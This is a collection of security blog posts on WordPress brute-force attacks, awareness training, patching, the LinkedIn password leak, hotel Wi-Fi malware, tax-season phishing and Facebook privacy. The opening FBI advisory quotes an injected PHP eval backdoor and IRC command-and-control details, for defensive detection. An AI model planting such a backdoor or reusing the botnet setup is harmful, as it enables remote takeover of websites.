SUMMARY
As of April 9, 2013, multiple web hosting companies began seeing brute force, dictionary attacks against their WordPress Content Management System. Approximately 140,000 IPs have been seen attacking these systems. After successful login, the actors are installing several PHP scripts which execute shell commands, download files from www.marinabybloshotel.com that establish connections with an IRC server and can be used to conduct a variety of different attacks. The actors are also uploading a malicious process “ssh” (created by 3proxy.ru) into “public_html”.

TECHNICAL DETAILS
The compromised WordPress systems are being managed from an IRC server. Information on IRC server:

fakeproc = “/usr/sbin/httpd”;
ircserver = “58.221.92.242”;
ircport = “21333”;
nickname = “UpBot-V5[“.int(rand(100)).”]”;
nickname = “PhP[“.int(rand(100)).”]”;
channel = “#up”
channel = “#bots”

The actors are also injecting code (on WordPress) the following code to index.php in the “public_html” directory for arbitrary code execution:

<?php if(isset(($_POST[“02f6cf”])){eval(stripslashes($_POST[‘c”]));exit;}; ?>

The eval statement contained a “wget” to www.marinabybloshotel.com

The md5 of the ssh binary is 52977b21b54237be5f9ac1d5fb641c53

Web hosting companies can search in web logs and in file systems to see if they are impacted by this attack.

Source: Federal Bureau of Investigation (FBI)

Yesterday began like all others, a good morning to my Twitter followers and a quick scan through the topics of others I follow. The topic of discussion that stood out, dividing our industry more often than any others got started; the belief, or lack thereof, in Security Awareness Training Programs being a benefit to organizations. The sides step back, stand in their respected corners, the bell rings, and both sides come out swinging. The first round went to Bruce Schneier, @DarkReading, with his article entitled “On Security Awareness Training – The focus on training obscures the failures of security design” and then the fire built inside and the opposing side came back, not only stronger, but direct. Dave Kennedy, @dave_rel1k, the founder of TrustedSec,@TrustedSec, and co-founder of DerbyCon, @DerbyCon , came back with the argument in direct contradiction to Bruce’s statements with his blog post entitled “The Debate on Security Education and Awareness”. Along with Dave, Ben Mauch, @Ben0xA, wrote “Security Awareness Education”, where he references a talk, “Creating a Powerful User Defense Against Attackers”, he did this talk at the 2012 DerbyCon security conference in which he describes user education and the pitfalls many educators fall into when trying to build these awareness programs.

Under our code of full disclosure, I will say that my respect for Bruce is very high not only as a security practitioner but as a writer, Dave is a dear friend and is absolutely dedicated to our craft, and Ben, another person I highly respect and consider a friend. However, none of my opinions regarding the topic of user awareness or education are being swayed in any direction because of friendships or respect for any single person. My words here are coming strictly from experience with training people in numerous different industries. I have trained on topics ranging greatly, but the one thing that has stayed constant has been the people’s reactions and responses to the experience, the final evaluations, and personal observations interacting with people during these training sessions. That being said let’s get to why I believe that there is error in Bruce’s article…

I could go back and rehash the points made by Dave and Ben, which are spot on, but what does this serve to better our community or the topic at hand? Let’s look at training in general. I have found that if you throw material at a group of people who have no stake in the game, whether it is Information Security, Nuclear, Biological, or Chemical warfare, the end result is still the same. Some will pick up a little, retain even less, and after a few months their ability to recall the information is virtually gone. Humans in general can only retain so much information in a given time frame, and if the case is not made that this information is just as important to them personally, it will most likely be put into a small data store tucked away in a deep dark corner of their brain. Due to this I have to sit back and look at both sides of this fence and try to calculate where Bruce fell short in his article. I do believe that the Security Awareness Training as we know it, as it stands across the board, in the majority of organizations, has failed and failed horribly. That statement being said, one might believe Bruce’s story and run out with the money saved to buy the next “check box” compliant appliance, to fight the onslaught of Cyber, APT, nation state, attack vector because our sales monkey told us that it would prevent this type of attack. Yes, that was a total of three over used buzz words, so take three drinks! The truth is that every government in the world builds technology into their schema for war, but every person I have ever spoke to regarding warfare has said that HUMINT, Human Intelligence, is what wins the battles. The key here being “Human”, it is the human element not the technology that is going to give us the leading edge in this war against the attackers.

As the defending blue team you need to face that fact that you have lost! What’s the old saying, “Admitting you have a problem is the first step” or something like that. So once you have come to the fact you lost what’s left to do? Give up, go home, change career fields, maybe stick your head in a hole, NO, the next step is to figure out how to reduce the impact of an event. Blinking lights, new appliances, and awesome sales pitches from the monkeys, are all great; but ultimately they are reaction based solutions. YES, I know there are proactive steps that these methods do apply, but keep in mind many of these items are found to be misconfigured, misunderstood, or simply don’t do what the monkeys claim they did. The fact remains that the very first line of defense, in an industry that prides itself on multiple layers of defense, IS the users.

So how do we utilize the assets that we already have?

Utilize these users as our first line of defense, but how?

EDUCATION!

STOP, please STOP, treating users like dumb, mindless, morons, who couldn’t understand the difference between the flux capacitor and a firewall! People are NOT stupid, uneducated yes, stupid no. If you take the time to develop training around the people, and not around the “check boxes” you WILL get a return on the investment. For example, why do awareness programs always have to focus on how to handle email attacks in relationship to the XYZ Corporation? Isn’t a phishing attack, at its core, the same as a user who is sitting in their home checking their personal email account? The answer is simple, YES! Going back to my original thought for a moment, what does it take to make humans, in our case users, retain and actually learn something from the awareness program? Make it about THEM! EDUCATE the users on how to spot a phishing attack and use their personal email as examples. Explain the implications of such things as the loss of money in their bank account, or how their computer could become a node on a huge botnet, maybe, just maybe, you will find that these same people will be able to better associate the discussions about the corporate phishing attacks once they can relate that attack to something they see in their personal life. Just maybe, the programs shortcomings don’t lay with the users but instead with the manner in which the material is structured and delivered.

We all say it over and over, that security must be done in layers. This is done not because a “check box” told us to, or a sales monkey sold us each layer of the defensive ring and they said it would achieve god like results; it’s being done so that if the first layer fails the second is there to help reduce the risk. The idea is that as the attacker moves from one layer to another some red flag is raised as to the abnormal behavior a device, system, or user account is taking and will be seen by admins, security staff, or the key master watching out for the abnormalities that occur. So look at the organizations out there, most are under staffed, over worked, and miss a great deal of things that should have truly been caught. Take a well EDUCATED user base and you have just increased the number of people who are your first line of defense in catching these abnormalities. Will some users fail this task and still allow attackers in, of course they will; but isn’t that why we have layers. If the first fails, the remaining layers should alert on the activity. On that same mindset of layers, wouldn’t it be beneficial then to have an extra layer to help catch these things? The thought that Bruce is taking would throw out this layer in lieu of a new shiny, blinky light, sales monkey’s appliance or service; we all know how these products and services are working not working for us currently!

So in closing, if your program is failing, you have a great deal of attacks coming from your user base, and you feel that the failure stems from the program, you may be absolutely correct. To say you are throwing the program out in lieu of something else is WRONG! Look at the program and see if the program is “teaching” by throwing material and facts out to the users or is it “educating” the users by relating to them. If you relate to the user and show them how the same methods can protect them in their personal life as it does in their professional life you will see better results. More so you will see a much stronger, better educated, and more aware user base as your first line of defense!

Now go out and EDUCATE people instead of treating them like dumb, mindless, morons, who couldn’t understand the difference between the flux capacitor and a firewall!

Today’s Information Technology (IT) field changes so rapidly that it’s difficult to stay abreast of all the daily, weekly, and monthly tasks we as IT professionals face. One such task is patching the servers and other systems we use on an everyday basis; all while maintaining that critical uptime. Today we are given a new set of tools in our fight; the addition to our collection comes from SolarWinds in the form of a community space by the name of PatchZone. In my previous posts I mention my latest endeavor with SolarWinds as well as my first post “The Patch Management Process: 5 Common Sense Tips”. However, today I would like to share with you the co-bloggers who joined the team; the highly anticipated release of the 3rd party updates section, as well as the company news article released today.

I would like to start off by saying that it is an honor to be writing alongside individuals who are leaders in our field. They have a proven track record of expertise and are always willing to help others learn. To be working with such talent in a community such as this will garner not only incredible articles but insight into areas many are not fortunate enough to be a part of during their everyday activities. Please welcome Brien Posey, Augusto Alvarez, and Lawrence Garvin to the team. Feel free to ask any of us questions or if you have an idea for an article. We are all very excited about the upcoming adventures in patch management!

SolarWinds, and more specifically, PatchZone has a unique offering others have yet explore. The SolarWinds team has put together a table of 3rd party updates, and provided this dynamic spreadsheet to aid in the ability to know what piece of software is on which version. This is a tremendous resource if you are trying to make sure that the systems you take care of are at the level they need to be; saving hours upon hours going back and forth between vendor sites gathering the same data on your own. I encourage everyone to take a look, and if there is a piece of software you would like to see on the list message the team at SolarWinds and they will see what they can do to get that added to the list.

Like all great things in our field there are news releases. PatchZone is no different. Here is “SolarWinds Launches PatchZone.org to Help IT Pros Patch Microsoft and Third Party Applications”, a company news article. It doesn’t stop there folks, no, the excitement continues as the news about PatchZone picks up we have Reuters, MarketWire, and Investors also sharing with the announcement.

In closing, take a minute to head over to PatchZone; read over the articles, forums, and most importantly ask questions or suggest topics you would like to see written. To stay on top of these fast paced developments take a second to sign up for the PatchZone news and tips newsletter located at the top right hand corner of the community space. An outstanding resource for receiving the information but still allows you to choose which articles best suit your needs while still staying current.

Imagine a life where you have thousands of workstations, hundreds of servers, and thousands upon thousands users all over the world. Now imagine you have this environment with a fraction of the staff you truly need to keep everything running properly.

How will you keep your environment up to date?

How will you manage this monster?

You need a rock solid patch management process, but that’s complicated right? It’s custom, it’s expensive, it’s just not feasible. No, it doesn’t have to a nightmare nor custom.

Whether you are managing tens of thousands of systems and users or just a dozen; the process is still the same. I had the pleasure of writing for SolarWinds new PatchZone on this topic; The Patch Management Process: 5 Common Sense Tips to use as an outline for your environment, small or large, your logic still works.

If you would like to add to this, or help building your process feel free to drop me a line and I will be more than happy to incorporate your suggestions or help find solutions to your specific issue.

Turn your nightmare into a pleasurable thing of the past!

Throughout my career I have had the honor and pleasure to work with some of the greatest minds this world has to offer, but never have the adventures led me down my most recent endeavor. I am happy and excited to announce that I have been asked to join forces with the SolarWinds team in launching a new community driven space within Thwack called Patchzone. Patchzone will provide numerous avenues of information for all levels of experience. There will be a combination of blog postings, whitepapers, webcasts, and news related to patching not only Microsoft products but also 3rd party applications as well. [Official Release Statement]

Being a huge supporter in the idea that information should be shared, the experienced should help the beginners, leaves me thrilled to be a part of this community. All the way through my career I have had the fundamental principle to help educate and expand the knowledge pool around us. Believing that the more collective minds you have working on a problem will not only produce a greater number of solutions but the best solution for that particular problem; this is no different!

I hope to bring a series of posts which start from what patching does and why patch management is so important; all this while keeping a focus on the security implications and benefits of not only your systems but also the environment in which these systems operate. There will be a sharing of resources, articles, and insight into methods or procedures which I have found to work for me; hoping to help others struggling with patches and patch management along the way.

Please welcome aboard SolarWinds, Thwack, and the entire patchzone.org community!

Yesterday brought a considerable amount of attention, and mayhem from the LinkedIn password dump. Many security researchers and professionals were trying to gather as much information as possible, while still having the monkey on their back wanting to know if their password was leaked. This onslaught of demand brought forth the good and the bad, but one question which remained the same was the desire to have something which could take their password and compare it against an estimated 6.5 million hashes, and fast. Websites began popping up everyone, domain registration grew, but one thing still bothered me…

In order to check your password you must trust that the creator of the website was ethical and not capturing your password to store somewhere else. There was the Javascript sites, the PHP sites, and even an ASP site; but the fact still remained. You must trust them! Maybe its just me, but a very large data breach, ~6.5 million records released, everyone is scrambling for answers, password crackers everywhere are smoking their GPUs in an attempt to get the passwords cracked, it just doesn’t seem logical that I should trust them. Now before anyone goes off screaming their site wasn’t collecting passwords, I know. Many, and I mean a good number, of the sites I found were legit sites by security professionals with incredible reputations. However, there has to be just one site that wasn’t. There has to be one person, a person who put numerous passwords into the one bad site trying to see if any of their passwords were on the list.

Lets say five people, did five password tries on the one bad guys website. Those five people think great, none of my passwords were in this list. However, they are now, because you just gave them 25 passwords they didn’t have previously. Not only did you give them the hash, you gave them the matching plain text password; saving them the time cracking the hash themselves!

This brings me to my late night / early morning project. The adventure began, the goal was to write a script so that I could test my passwords while still feeling safe in the fact that I was not giving my information to some website. While hard coding the password was quick, simple, and quite easy; that’s just not my style. I jumped head first, deciding that it should be flexible to take any hash dump, and the user should be able to specify the hash dump filename, and the password. Thus HashCheck was born!

The LinkedIn hashes posed a slight snag in the fact that the first five characters could have been 0’s to pad the length. Currently HashCheck will do the Linked SHA1 hashes but I will shortly be able to do standard hashes without much trouble, I just need some time to finish writing it. My goal was to just get this out in to the public so that people who want to check their passwords can without the fear of using a website.

I have included a very small sample of the LinkedIn hashes and included the “password” password hash which was padded with five 0’s as mentioned before. I did this so you could use it as a control sample.

Enjoy, and look for updates! [Someone was playing around with GUIs today, so who knows what might come in the future]

Download the code [ HERE ]

Last night it came to the attention of the security community that the professional networking website, LinkedIn, was breached by a Russian hacker group when a suspected member posted on a Russian forum stating that an estimated that 6.5 million encrypted passwords were downloaded from LinkedIn, with 300,000 of those already cracked and dumped to underground.

The forum post has been down most of the afternoon, however it has come back up for short periods of time.

InsiderPro Forum Post – 6.5kk SHA-1 *** NO LONGER AVAILABLE ***
Google Cache [InsiderPro Forum Post – 6.5kk SHA-1]

According to many sources, LinkedIn is currently looking into the possible breach.

ZDNet – 6.46 million LinkedIn passwords leaked online

Venture Beat – 6.5M hashed LinkedIn passwords reportedly leaked, following app concerns

The Next Web – Bad day for LinkedIn: 6.5 million hashed password reportedly leaked – change yours now

CSO Online – True or not, changing your LinkedIn password is a smart idea

Sophos Blog – Millions of LinkedIn passwords reportedly leaked – take action NOW

Business Insider – Change Your LinkedIn Password Right Now!

According to LinkedIn News posted on their Twitter account they yet to confirm or deny the incident:

@LinkedInNews
Our team is currently looking into reports of stolen passwords. Stay tuned for more.

@LinkedInNews
Our team continues to investigate, but at this time, we’re still unable to confirm that any security breach has occurred. Stay tuned here.

If you have a LinkedIn account then change that password NOW!

If you have used the same password on any other website, email account, corporate access, or anywhere for that matter, change those passwords as well.

*** UPDATE 06 June 2012 @ 4:45PM EST ***

@LinkedInNews
New Post: Further Update on LinkedIn Member Passwords Compromised. http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/

@LinkedInNews
New Post: Updating Your Password on LinkedIn and Other Account Security Best Practices http://blog.linkedin.com/2012/06/06/updating-your-password-on-linkedin-and-other-account-security-best-practices/

I have real concerns with the method in which LinkedIn is going to notify the users of the breach and how long it has taken them to admit (or not admit) the breach even occurred. It appears LinkedIn is going to email users the password reset instructions, most likely with a link for the user to click. Then they are going to send a second email with a little more context as to why the change. They did however mention that the user shouldn’t follow links provided in emails, however every email I have ever seen from LinkedIn has links embedded in them. You have programed users to see these links, and those who carry out Phishing attacks have now just been advised on the number of emails, and the general context of the email. You, LinkedIn, have just provided the greatest opportunity for a Phishing scam to further compromise your users.

I have already received at least one phishing email based on a LinkedIn theme, granted this was an attempt to get me to go to the premium package and the timing was just luck that it arrived right after this. However, this will only increase as time progresses with the emails being more directed and focused on the breach and your password change.

Here is the email I received with the links removed for obvious reasons:

Upgrade to LinkedIn Premium
free for 1 month

Hi Robert,

Thank you for being a valuable LinkedIn member. As a special gift, we’d like to offer you a 1- month free upgrade to LinkedIn Premium. Unlock the real power of your network – start today!

• Who’s Viewed Your Profile — see the full list.
• Contact anyone on LinkedIn with InMail messages, even people outside your network.
• View full profiles of all 150 million LinkedIn members, not just people in your network.
• Search better with premium filters and 7x more results in every search.

Your exclusive offer expires soon, so get started today!
Get LinkedIn Premium – FREE for 1 month!

Sincerely,
The LinkedIn Premium Team

*Terms and conditions

Promotional offer may be applied only towards a new LinkedIn Premium Business, Business Plus or Executive account. Valid only for new subscribers. Subscribers are responsible for any amount that exceeds the promotional credit offer. Subject to LinkedIn terms of usage. The promotional credit is not transferable and may not be sold or bartered. Offer may be revoked at any time, for any reason by LinkedIn, Inc. One promotional offer per eligible subscriber. Void where prohibited or restricted by law. Expires June 15 2012. LinkedIn Premium services are sold on a subscription basis and are automatically charged to your credit card at the beginning of each subscription period. Discount applies to the first month of a LinkedIn Premium account subscription. After this period, you will be charged the standard rate on your renewal date unless or until you cancel your LinkedIn Premium account.
If you need assistance or have questions, please contact LinkedIn Customer Service.

If you prefer not to receive these messages, unsubscribe.

To ensure you receive our emails in your inbox, add [email protected] to your address book.
©2012 LinkedIn Corporation, Inc. LinkedIn, the LinkedIn logo, and InMail are registered trademarks of LinkedIn Corporation in the United States and/or other countries. All rights reserved. LinkedIn Corporation, Inc. 2029 Stierlin Ct., Mountain View, CA 94043 USA

*** UPDATE 07 June 2012 @ 4:50PM EST ***

Added the Google cache link to the InsiderPro Forum thread
Noted that the InsiderPro Forum thread was not longer active

In the past security professionals all across the world have spoken out regarding the hazards of using an open wireless networks at a hotel while traveling. Yet, it still falls short because many people still use these networks without regard to the dangers they potentially face.

Just as others have mentioned in the past, I am going to restate the fact that any open network should be considered hostile!

Take the appropriate measures to protect your computer from these potentially dangerous networks. Try to use a combination of multiple safety precautions, such as a VPN connection, inbound and outbound firewall, monitor system performance before traveling and then again while traveling looking for differences which might indicate new processes are running in the background, if possible have one laptop for travels and one for while you are not traveling, reloading the operating system when you return from your trip, change your passwords on a different machine as soon as you return, avoid checking your bank or credit card accounts, and lastly avoid checking email on your laptop, instead try using your smart phone if possible. If you travel a great deal the option regarding two laptops may not be possible but it is very effective when combined with other options. These options are just a small sample of things you can do to help mitigate the hostile networks that are found while traveling, but every little bit helps!

The news article below was released by the Internet Crime Complaint Center (IC3) on May 5th, 2012 with regards to malware that was installed on travelers laptops.

These travelers got more than just frequent flyer miles on this trip!

Malware Installed on Travelers’ Laptops Through Software Updates on Hotel Internet Connections

Recent analysis from the FBI and other government agencies demonstrates that malicious actors are targeting travelers abroad through pop-up windows while establishing an Internet connection in their hotel rooms.

Recently, there have been instances of travelers’ laptops being infected with malicious software while using hotel Internet connections. In these instances, the traveler was attempting to setup the hotel room Internet connection and was presented with a pop-up window notifying the user to update a widely-used software product. If the user clicked to accept and install the update, malicious software was installed on the laptop. The pop-up window appeared to be offering a routine update to a legitimate software product for which updates are frequently available.

The FBI recommends that all government, private industry, and academic personnel who travel abroad take extra caution before updating software products on their hotel Internet connection. Checking the author or digital certificate of any prompted update to see if it corresponds to the software vendor may reveal an attempted attack. The FBI also recommends that travelers perform software updates on laptops immediately before traveling, and that they download software updates directly from the software vendor’s Web site if updates are necessary while abroad.

Anyone who believes they have been a target of this type of attack should immediately contact their local FBI office, and promptly report it to the IC3’s website at www.IC3.gov. The IC3’s complaint database links complaints together to refer them to the appropriate law enforcement agency for case consideration. The complaint information is also used to identify emerging trends and patterns.

Source: IC3 – Intelligence Note

As the tax season approaches so does the potential for someone to gain access to your computer, whether it is a company computer or your personal computer. Today’s computer criminals are no longer focusing on gaining control of your computer to attack someone else, while that is still a concern it is no longer the main concern. The primary concern in today’s battle against these crimes is your personal and financial information!

Let’s take a second to look at the real risk. How does someone gain this information? There are many vectors but the primary one is via email. This is commonly referred to as “Phishing”, pronounced the same as “fishing” (FISH-ing), and normally involves an email crafted in such a way as the end recipient would believe it is real; whether that is from a family member, friend, or government agency. This is similar to the methods used and commonly referred to as SPAM; however Phishing is targeted to a small group of people and very focused, while SPAM is normally sent out to very large groups of people and most of the time unfocused. Phishing is very dangerous in the fact that it will allow remote control and data leakage of a system with virtually zero detection by the end user.

So why is this bad?

So someone leaks what is stored on your computer, why should I be concerned? Let’s say you use your bank account online, your usernames and passwords can be leaks as well as any cookies. If a person has your username and password along with your cookies they could potentially log into your bank at the same time. Leaving their browser open after you close yours, then transfer the money out of your account into an account somewhere else in the world. Possible yes, most likely no, more than not a criminal is looking for things like your name, address, phone number, social security number, and credit card numbers. These things are called Personal Identifiable Information (PII). This information is then sold on the information black market; which in turn ends up in the hands of people who steal your identity and begin to create a double life posing as you. They get loans, cars, houses, anything you can do they could potentially do. Leaving you to hold the bag and clean up the mess!

I am telling you this in hopes to bring light to the problems we all face. I receive alerts on a regular basis from the United States Computer Emergency Response Team (US-CERT). On February 8th, 2012 I receive one such alert related to our upcoming tax season. Please take a moment to think about the above mentioned concerns and then relate that to the type of information a criminal could gain using a US Taxes Phishing email, as well as reading the information below, and on the US-CERT website on how to better protect your information against attacks like this. Also share this information with family and friends, the more we know about these items the better protected we all can be!

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1

US-CERT Current Activity

US Tax Season Phishing Scams and Malware Campaigns

Original release date: February 8, 2012 at 11:10 am
Last revised: February 8, 2012 at 11:10 am

In the past, US-CERT has received reports of an increased number of
phishing scams and malware campaigns that take advantage of the United
States tax season. Due to the upcoming tax deadline, US-CERT reminds
users to remain cautious when receiving unsolicited email that could
be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include, but are not
limited to, the following:
* information that refers to a tax refund,
* warnings about unreported or under-reported income,
* offers to assist in filing for a refund, and
* details about fake e-file websites.

These messages, which may appear to be from the IRS, may ask users to
submit personal information via email or may instruct the user to
follow a link to a website that requests personal information or
contains malicious code.

US-CERT encourages users and administrators to take the following
measures to protect themselves from these types of phishing scams and
malware campaigns:
* Do not follow unsolicited web links in email messages.
* Maintain up-to-date antivirus software.
* Refer to the IRS website related to phishing, email, and bogus
website scams for scam samples and reporting information.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document
for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks
document for more information on social engineering attacks.

Relevant Url(s):
http://www.us-cert.gov/cas/tips/ST04-014.html

http://www.us-cert.gov/reading_room/emailscams_0905.pd

http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5

====
This entry is available at
http://www.us-cert.gov/current/index.html#us_tax_season_phishing_scams1

—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.5 (GNU/Linux)

iQEVAwUBTzKfWD/GkGVXE7GMAQKPEQf/Q8U+iKgDegdYbiOO9j9qdPZ6CGu0QpVj
f217/DGZG/ji20FRB4kl1RrRb+NqMBgZrYrUbTh0zKc6FiaZyY2wIr+PoHv6SYAr
t86QF2h86QyjCI5JspIfkPSVenOO5nIytgUpeUc0w6e38JlkRAwfPvkhPLKAqk6c
o83t8BYiTh144R4lA7VnPpAOriq2D84bBF8P1qVDWEdQQFK84sDm58tNKnVMBe5K
iULHh+G8mXGzqjYm3TkQgBn3YkxJZq10YhnhEeydpJd0BbbNC/SEqD8Bqkg/k6UO
fVEdUfHaWKile0EU388/uXVkksbjqTursBhEm9jh92Z0W13df0pv9w==
=bzDg
—–END PGP SIGNATURE—–

An investment in knowledge pays the best interest.
~ Benjamin Franklin ~

While doing some research, and trying to get a better understanding of the “Occupy Movement”, I found that nearly every profile associated to a particular city has placed similar privacy disclaimers on the Facebook profile.  While I understand the intent of this is to protect the people who are visiting the profile, posting on the wall, or the images and pictures put up for everyone to see.  However, if these people are ultimately making themselves and the “Movement” look completely ignorant.

When you have a profile on Facebook, MySpace, Foursquare, or any other social media website that is viewable by any individual with access to the intertubes is a “public” sphere, which means it is “PUBLIC”.  This, you would think, is common sense, however it’s seen over and over when reviewing these profiles.

Here is an example of such a disclaimer:

About Occupy

PRIVACY NOTICE:

Warning–any person and/or institution and/or Agent and/or Agency of any governmental structure including but not limited to the US Federal Government and the UK goverment also using or monitoring/using this website or any of its associated websites, you do NOT have my permission to utilize any of my profile information nor any of the content contained herein including, but not limited to my photos, and/ or the comments made about my photo’s or any other “picture” art posted on my profile. You are hereby notified that you are strictly prohibited from disclosing, copying, distributing, disseminating, or taking any other action against me with regard to this profile and the contents herein. The foregoing prohibitions also apply to your employee(s), agent(s), student(s) or any personnel under your direction or control. The contents of this profile are private and legally privileged and confidential information, and the violation of my personal privacy is punishable by law.

***** It is recommended that you post a similar notice like this on your profile/page *******

THIS IS A LEGAL BINDING NOTICE – YES GOVERNMENT/BIG BROTHER THAT MEANS THE ABOVE NOTICE APPLIES TO YOU TOO!

Thank you

When reading this you come to think this is written by a lawyer with a great deal of privacy rights experience, but knowing the law you will see this is simply copied and pasted in an attempt to provide a self full filled belief of being safe for speaking your mind or posting on Facebook.

Let’s look at this from outside the box, a logical approach to Facebook, and privacy…

• If you create a profile which is seen by anyone with access to the internet, it is PUBLIC.
• If you speak to a crowd of people on the street, it is PUBLIC.
• If you do or say anything illegal and post this on your profile, it is ILLEGAL & PUBLIC.
• If you do or say anything illegal and tell people this on the street, it is ILLEGAL & PUBLIC.
• If you post a picture on your profile, it is PUBLIC
• If you hold up a picture on the street, it is PUBLIC

So with the small examples above let’s look at what PUBLIC really means:

Per the Merrian-Webster “Public” means:

• of, relating to, or affecting all the people or the whole area of a nation or state <public law>

That description should explain it, however let’s look at again.  Public means the OPPOSITE of “Private”, let’s see:

• belonging to or concerning an individual person, company, or interest <a private house>

So to give benefit to the people posting this stuff, they believe that the “Occupy Movement” is an interest and thus governed by the laws of “Private” and “Privacy”, however this is not Facebook.  Facebook is intended for “Public” use and thus NOT covered by the “Privacy” laws under the definition of a “Private” classification.

Now, with all this said, how can you, as a member of the “Occupy Movement”, understand when you are standing on a street or posting to Facebook you have no right to privacy.  When you attempt to protect yourself and do something such as this, you simply look ignorant and only hurt your so called cause.

If you believe I am mistaken, please take a moment and think about the EFF who were started to protect everyone’s rights and their privacy.  They have fought numerous legal battles for the rights of internet users, so for them to respond to my question about Facebook only proves this thought.

Here is the question posed to the EFF:

I have a question regarding items you post on Facebook.  If your
profile is set to allow anyone in the public to view this and then law
enforcement uses something posted on your side is this allowed since it
is a public forum as if you were talking in a public space?  I believe
that since the profile is set for public view you give up any rights to
privacy and in turn cannot protect yourself based on your right to
privacy, even if you put up a disclaimer saying everything on this
profile is private and can not be used by law enforcement, blah, blah,
blah.  This again has no real basis other than I am trying to better
understand how the public/private issues play out on social media
websites when the user neglects privacy settings and opens the profile
up to the public.

Clarification on the second question would simply be awesome and help me
better educate others.

The response back by the EFF was:

You are correct, any sort of public information on Facebook is in the public sphere.

Clearly, if you are an “Occupy Movement” organizer, or one of their Facebook admins, remove this statement. It only makes you and your movement look ignorant, and what good is that doing for your so called cause…